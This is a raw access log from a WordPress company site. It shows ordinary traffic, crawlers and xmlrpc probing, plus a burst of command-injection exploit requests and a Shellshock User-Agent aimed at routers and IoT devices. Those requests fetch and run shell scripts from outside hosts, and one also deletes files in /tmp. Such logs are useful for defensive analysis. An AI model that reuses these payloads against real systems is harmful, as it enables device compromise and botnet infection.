14.108.234.80 - - [23/Sep/2025:16:38:52 +0800] "GET /wp-content/uploads/2025/07/1750649207-qizhou1920x1080_9.webp HTTP/1.1" 200 146108 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0"
14.108.234.80 - - [23/Sep/2025:16:38:52 +0800] "GET /wp-content/uploads/2025/07/1750649200-qizhou1920x1080_7.webp HTTP/1.1" 200 238866 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0"
14.108.234.80 - - [23/Sep/2025:16:38:52 +0800] "GET /wp-content/uploads/2025/07/1750649212-qizhou1920x1080_10.webp HTTP/1.1" 200 143362 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0"
14.108.234.80 - - [23/Sep/2025:16:38:52 +0800] "GET /wp-content/uploads/2025/07/1750649203-qizhou1920x1080_8.webp HTTP/1.1" 200 256782 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0"
14.108.234.80 - - [23/Sep/2025:16:38:52 +0800] "GET /wp-content/uploads/2025/07/1750649183-qizhou1920x1080_2.webp HTTP/1.1" 200 267936 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0"
14.108.234.80 - - [23/Sep/2025:16:38:52 +0800] "GET /wp-content/uploads/2025/07/1750649215-qizhou1920x1080_11.webp HTTP/1.1" 200 171642 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0"
14.108.234.80 - - [23/Sep/2025:16:38:52 +0800] "GET /wp-content/uploads/2025/07/1750945514-honor300%C3%97206_3.webp HTTP/1.1" 200 74124 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0"
14.108.234.80 - - [23/Sep/2025:16:38:52 +0800] "GET /wp-content/uploads/2025/07/1750945616-honor300%C3%97206_4.webp HTTP/1.1" 200 33814 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0"
14.108.234.80 - - [23/Sep/2025:16:38:52 +0800] "GET /wp-content/uploads/2025/07/1750945637-honor300%C3%97206_5.webp HTTP/1.1" 200 77368 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0"
14.108.234.80 - - [23/Sep/2025:16:38:52 +0800] "GET /wp-content/uploads/2025/07/1750945650-honor300%C3%97206_6.webp HTTP/1.1" 200 66306 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0"
14.108.234.80 - - [23/Sep/2025:16:38:53 +0800] "GET /wp-content/uploads/2025/07/1750656103-Visionr2000x800_20250623131702.webp HTTP/1.1" 200 57650 "http://cqqizhou.com/wp-content/uploads/elementor/css/post-1849.css?ver=1755835654" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0"
36.133.115.36 - - [23/Sep/2025:16:42:34 +0800] "POST /wp-cron.php?doing_wp_cron=1758616954.4407908916473388671875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.153.87.54 - - [23/Sep/2025:16:42:34 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.153.87.54 - - [23/Sep/2025:16:42:36 +0800] "GET / HTTP/1.1" 200 33466 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [23/Sep/2025:16:46:29 +0800] "POST /wp-cron.php?doing_wp_cron=1758617189.3023340702056884765625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
108.179.219.178 - - [23/Sep/2025:16:46:29 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [23/Sep/2025:16:54:18 +0800] "POST /wp-cron.php?doing_wp_cron=1758617658.6115999221801757812500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
3.83.250.167 - - [23/Sep/2025:16:54:18 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
36.133.115.36 - - [23/Sep/2025:17:07:30 +0800] "POST /wp-cron.php?doing_wp_cron=1758618450.8109939098358154296875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
71.6.199.65 - - [23/Sep/2025:17:07:30 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 zgrab/0.x"
185.39.19.49 - - [23/Sep/2025:17:10:29 +0800] "GET / HTTP/1.0" 200 165852 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
185.39.19.49 - - [23/Sep/2025:17:10:30 +0800] "GET /contacts/ HTTP/1.0" 200 76104 "http://cqqizhou.com/contacts/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
36.133.115.36 - - [23/Sep/2025:17:10:32 +0800] "POST /wp-cron.php?doing_wp_cron=1758618632.6179869174957275390625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
185.39.19.49 - - [23/Sep/2025:17:10:35 +0800] "POST /contacts/ HTTP/1.0" 200 68820 "http://cqqizhou.com/contacts/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
36.133.115.36 - - [23/Sep/2025:17:33:34 +0800] "POST /wp-cron.php?doing_wp_cron=1758620014.9377241134643554687500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
173.249.144.86 - - [23/Sep/2025:17:33:35 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
42.236.17.123 - - [23/Sep/2025:17:48:56 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
42.236.17.123 - - [23/Sep/2025:17:48:59 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 499 0 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
36.133.115.36 - - [23/Sep/2025:17:49:01 +0800] "POST /wp-cron.php?doing_wp_cron=1758620941.5981628894805908203125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
42.236.101.198 - - [23/Sep/2025:17:54:09 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
36.133.115.36 - - [23/Sep/2025:17:54:13 +0800] "POST /wp-cron.php?doing_wp_cron=1758621253.0224630832672119140625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
42.236.101.198 - - [23/Sep/2025:17:54:13 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 33 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
36.133.115.36 - - [23/Sep/2025:18:04:39 +0800] "POST /wp-cron.php?doing_wp_cron=1758621879.5157120227813720703125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
176.65.149.245 - - [23/Sep/2025:18:04:39 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [23/Sep/2025:18:15:50 +0800] "POST /wp-cron.php?doing_wp_cron=1758622550.6465559005737304687500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.193.144 - - [23/Sep/2025:18:15:50 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [23/Sep/2025:18:25:22 +0800] "POST /wp-cron.php?doing_wp_cron=1758623122.3694989681243896484375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [23/Sep/2025:18:25:23 +0800] "GET / HTTP/1.1" 200 151919 "-" "-"
36.133.115.36 - - [23/Sep/2025:18:27:25 +0800] "POST /wp-cron.php?doing_wp_cron=1758623245.3669650554656982421875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
115.79.196.94 - - [23/Sep/2025:18:27:25 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [23/Sep/2025:18:36:31 +0800] "POST /wp-cron.php?doing_wp_cron=1758623791.5954260826110839843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
101.33.55.204 - - [23/Sep/2025:18:36:31 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
220.181.108.147 - - [23/Sep/2025:18:50:09 +0800] "GET /wp-content/uploads/2025/07/1753453127-%E4%BD%99%E5%8D%B7product_Single600%C3%97284.webp HTTP/1.1" 200 18744 "-" "Baiduspider-image+(+http://www.baidu.com/search/spider.htm)"
36.133.115.36 - - [23/Sep/2025:19:05:27 +0800] "POST /wp-cron.php?doing_wp_cron=1758625527.5308549404144287109375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.193.144 - - [23/Sep/2025:19:05:27 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [23/Sep/2025:19:08:03 +0800] "POST /wp-cron.php?doing_wp_cron=1758625683.7452690601348876953125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
116.207.207.231 - - [23/Sep/2025:19:08:03 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 8.4; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.2142.88 Safari/537.36"
116.207.207.231 - - [23/Sep/2025:19:08:04 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 8.4; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.2142.88 Safari/537.36"
116.207.207.231 - - [23/Sep/2025:19:08:04 +0800] "GET /contacts/ HTTP/1.1" 200 21496 "-" "Mozilla/5.0 (Windows NT 8.7; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.2420.88 Safari/537.36"
36.133.115.36 - - [23/Sep/2025:19:31:20 +0800] "POST /wp-cron.php?doing_wp_cron=1758627080.7183659076690673828125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
122.45.51.68 - - [23/Sep/2025:19:31:20 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
45.88.186.32 - - [23/Sep/2025:19:35:24 +0800] "GET /goform/webRead/open/?path=%7Cwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.wtf.sh%7Csh HTTP/1.0" 499 0 "-" "Mozilla/5.0 (bang2012@protonmail.com)"
45.88.186.32 - - [23/Sep/2025:19:35:24 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%60busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.zqq.sh%7Csh%60 HTTP/1.1" 499 0 "-" "Mozilla/5.0 (bang2012@protonmail.com)"
45.88.186.32 - - [23/Sep/2025:19:35:24 +0800] "POST /apply_sec.cgi HTTP/1.1" 499 0 "http://36.133.115.36/login_pic.asp" "Mozilla/5.0 (bang2012@protonmail.com)"
36.133.115.36 - - [23/Sep/2025:19:35:24 +0800] "POST /wp-cron.php?doing_wp_cron=1758627324.6636190414428710937500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.88.186.32 - ffadmin [23/Sep/2025:19:35:25 +0800] "POST /apply.cgi HTTP/1.1" 499 0 "http://36.133.115.36/apply.cgi" "Mozilla/5.0 (bang2012@protonmail.com)"
45.88.186.32 - root [23/Sep/2025:19:35:25 +0800] "POST /dvr/cmd HTTP/1.1" 499 0 "-" "Mozilla/5.0 (bang2012@protonmail.com)"
45.88.186.32 - admin [23/Sep/2025:19:35:25 +0800] "POST /dvr/cmd HTTP/1.1" 499 0 "-" "Mozilla/5.0 (bang2012@protonmail.com)"
45.88.186.32 - - [23/Sep/2025:19:35:26 +0800] "GET / HTTP/1.1" 499 0 "-" "() { :; }; /bin/bash -c \x22(wget -qO- http://74.194.191.52/rondo.qre.sh||busybox wget -qO- http://74.194.191.52/rondo.qre.sh||curl -s http://74.194.191.52/rondo.qre.sh)|sh\x22& #Mozilla/5.0 (bang2012@protonmail.com)"
45.88.186.32 - ffadmin [23/Sep/2025:19:35:26 +0800] "POST /apply.cgi HTTP/1.1" 499 0 "http://36.133.115.36/apply.cgi" "Mozilla/5.0 (bang2012@protonmail.com)"
45.88.186.32 - admin [23/Sep/2025:19:35:27 +0800] "POST /goform/SystemCommand HTTP/1.1" 499 0 "-" "Mozilla/5.0 (bang2012@protonmail.com)"
45.88.186.32 - - [23/Sep/2025:19:35:30 +0800] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ush.sh%7Csh%26&curpath=%2F&currentsetting.htm=1 HTTP/1.1" 499 0 "-" "Mozilla/5.0 (bang2012@protonmail.com)"
45.88.186.32 - admin [23/Sep/2025:19:35:30 +0800] "POST /cgi-bin/cgi_main.cgi HTTP/1.1" 499 0 "http://36.133.115.36/cfg_system_time.htm" "Mozilla/5.0 (bang2012@protonmail.com)"
45.88.186.32 - - [23/Sep/2025:19:35:31 +0800] "GET /cgi-bin/shortcut_telnet.cgi?wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.wyu.sh%7Csh%26 HTTP/1.1" 499 0 "-" "Mozilla/5.0 (bang2012@protonmail.com)"
45.88.186.32 - admin [23/Sep/2025:19:35:33 +0800] "POST /cgi-bin/server/server.cgi?func=server02_main_submit&counter=5.22497857400916&TEST_BTN4= HTTP/1.1" 499 0 "http://36.133.115.36/cgi-bin/server/server.cgi?func=server02_main_submit&counter=6.7496022225883&TEST_BTN4=" "Mozilla/5.0 (bang2012@protonmail.com)"
45.88.186.32 - admin [23/Sep/2025:19:35:33 +0800] "POST /editBlackAndWhiteList HTTP/1.1" 499 0 "-" "Mozilla/5.0 (bang2012@protonmail.com)"
45.88.186.32 - admin [23/Sep/2025:19:35:34 +0800] "POST /goform/mp HTTP/1.1" 499 0 "-" "Mozilla/5.0 (bang2012@protonmail.com)"
45.88.186.32 - - [23/Sep/2025:19:35:35 +0800] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27%3Bwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.djc.sh%7Csh%3B%27 HTTP/1.1" 499 0 "-" "Mozilla/5.0 (bang2012@protonmail.com)"
45.88.186.32 - - [23/Sep/2025:19:35:35 +0800] "POST /cgi-bin/system_mgr.cgi? HTTP/1.1" 499 0 "-" "Mozilla/5.0 (bang2012@protonmail.com)"
45.88.186.32 - - [23/Sep/2025:19:35:35 +0800] "POST /goform/Mail_Test HTTP/1.0" 499 0 "-" "Mozilla/5.0 (bang2012@protonmail.com)"
45.88.186.32 - - [23/Sep/2025:19:35:36 +0800] "GET /public/template.cgi?templatefile=%24%28wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.xbm.sh%7Csh%29 HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (bang2012@protonmail.com)"
45.88.186.32 - - [23/Sep/2025:19:35:36 +0800] "GET /setup.cgi?todo=funjsq_login&funjsq_access_token=12345|busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.fep.sh%7Csh%0A&test=11%00currentsetting.htm HTTP/1.1" 499 0 "-" "Mozilla/5.0 (bang2012@protonmail.com)"
45.88.186.32 - - [23/Sep/2025:19:35:37 +0800] "POST /cgi-bin/cstecgi.cgi HTTP/1.1" 499 0 "http://36.133.115.36/advance/parental.html" "Mozilla/5.0 (bang2012@protonmail.com)"
45.88.186.32 - - [23/Sep/2025:19:35:37 +0800] "GET /HNAP1/ HTTP/1.1" 499 0 "-" "Mozilla/5.0 (bang2012@protonmail.com)"
45.88.186.32 - - [23/Sep/2025:19:35:37 +0800] "GET /cgi-bin/;wget${IFS}-qO-${IFS}http://74.194.191.52/rondo.sbx.sh|sh&echo${IFS} HTTP/1.0" 499 0 "-" "Mozilla/5.0 (bang2012@protonmail.com)"
45.88.186.32 - - [23/Sep/2025:19:35:39 +0800] "GET /shell?busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.vcp.sh%7Csh%26 HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (bang2012@protonmail.com)"
36.133.115.36 - - [23/Sep/2025:19:36:44 +0800] "POST /wp-cron.php?doing_wp_cron=1758627404.7376439571380615234375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
111.174.40.174 - - [23/Sep/2025:19:36:44 +0800] "GET / HTTP/1.1" 301 5 "http://36.133.115.36:80" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
111.174.40.174 - - [23/Sep/2025:19:36:44 +0800] "GET / HTTP/1.1" 200 165874 "http://36.133.115.36:80" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
36.133.115.36 - - [23/Sep/2025:19:39:02 +0800] "POST /wp-cron.php?doing_wp_cron=1758627542.8365490436553955078125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.130.53.252 - - [23/Sep/2025:19:39:03 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [23/Sep/2025:19:40:24 +0800] "POST /wp-cron.php?doing_wp_cron=1758627624.6188690662384033203125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
47.236.180.205 - - [23/Sep/2025:19:40:24 +0800] "GET / HTTP/1.1" 301 5 "-" "curl/7.78.0"
185.39.19.34 - - [23/Sep/2025:19:48:57 +0800] "GET / HTTP/1.0" 200 165852 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
185.39.19.34 - - [23/Sep/2025:19:48:58 +0800] "GET /contacts/ HTTP/1.0" 200 76104 "http://cqqizhou.com/contacts/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
36.133.115.36 - - [23/Sep/2025:19:49:00 +0800] "POST /wp-cron.php?doing_wp_cron=1758628140.2473208904266357421875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
185.39.19.34 - - [23/Sep/2025:19:49:01 +0800] "POST /contacts/ HTTP/1.0" 200 68827 "http://cqqizhou.com/contacts/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
36.133.115.36 - - [23/Sep/2025:20:00:36 +0800] "POST /wp-cron.php?doing_wp_cron=1758628836.5702919960021972656250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
185.247.137.241 - - [23/Sep/2025:20:00:36 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
185.247.137.241 - - [23/Sep/2025:20:00:38 +0800] "GET / HTTP/1.1" 200 39369 "http://36.133.115.36" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
36.133.115.36 - - [23/Sep/2025:20:03:33 +0800] "POST /wp-cron.php?doing_wp_cron=1758629013.0455839633941650390625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.193.144 - - [23/Sep/2025:20:03:33 +0800] "GET / HTTP/1.1" 200 33468 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [23/Sep/2025:20:24:12 +0800] "POST /wp-cron.php?doing_wp_cron=1758630252.5648341178894042968750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
221.229.106.25 - - [23/Sep/2025:20:24:12 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [23/Sep/2025:20:30:53 +0800] "POST /wp-cron.php?doing_wp_cron=1758630653.5462419986724853515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.173.1.69 - - [23/Sep/2025:20:30:53 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.173.1.69 - - [23/Sep/2025:20:30:55 +0800] "GET / HTTP/1.1" 200 33467 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [23/Sep/2025:20:41:27 +0800] "POST /wp-cron.php?doing_wp_cron=1758631287.7562420368194580078125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
176.65.149.245 - - [23/Sep/2025:20:41:28 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [23/Sep/2025:20:46:05 +0800] "POST /wp-cron.php?doing_wp_cron=1758631565.7205829620361328125000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
3.132.23.201 - - [23/Sep/2025:20:46:05 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [23/Sep/2025:21:28:29 +0800] "POST /wp-cron.php?doing_wp_cron=1758634109.2966630458831787109375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.193.144 - - [23/Sep/2025:21:28:29 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
182.43.36.15 - - [23/Sep/2025:21:42:28 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1" 499 0 "-" "Hello, world"
36.133.115.36 - - [23/Sep/2025:21:42:28 +0800] "POST /wp-cron.php?doing_wp_cron=1758634948.8738389015197753906250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.115.36 - - [23/Sep/2025:21:51:55 +0800] "POST /wp-cron.php?doing_wp_cron=1758635515.8950800895690917968750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
17.241.227.200 - - [23/Sep/2025:21:51:55 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.241.227.200 - - [23/Sep/2025:21:51:56 +0800] "GET /portfolio-category/pickled-coil/ HTTP/1.1" 200 20869 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
36.133.115.36 - - [23/Sep/2025:22:00:32 +0800] "POST /wp-cron.php?doing_wp_cron=1758636032.6170589923858642578125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [23/Sep/2025:22:00:32 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [23/Sep/2025:22:12:53 +0800] "POST /wp-cron.php?doing_wp_cron=1758636773.2358319759368896484375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
135.119.112.84 - - [23/Sep/2025:22:12:53 +0800] "GET /developmentserver/metadatauploader HTTP/1.1" 404 8990 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [23/Sep/2025:22:17:47 +0800] "POST /wp-cron.php?doing_wp_cron=1758637067.1500759124755859375000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.155.140.157 - - [23/Sep/2025:22:17:47 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.155.140.157 - - [23/Sep/2025:22:17:48 +0800] "GET / HTTP/1.1" 200 33467 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [23/Sep/2025:22:18:50 +0800] "POST /wp-cron.php?doing_wp_cron=1758637130.5521268844604492187500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
85.95.216.149 - - [23/Sep/2025:22:18:50 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
42.236.17.58 - - [23/Sep/2025:22:24:27 +0800] "GET / HTTP/1.1" 200 39369 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0; 360Spider"
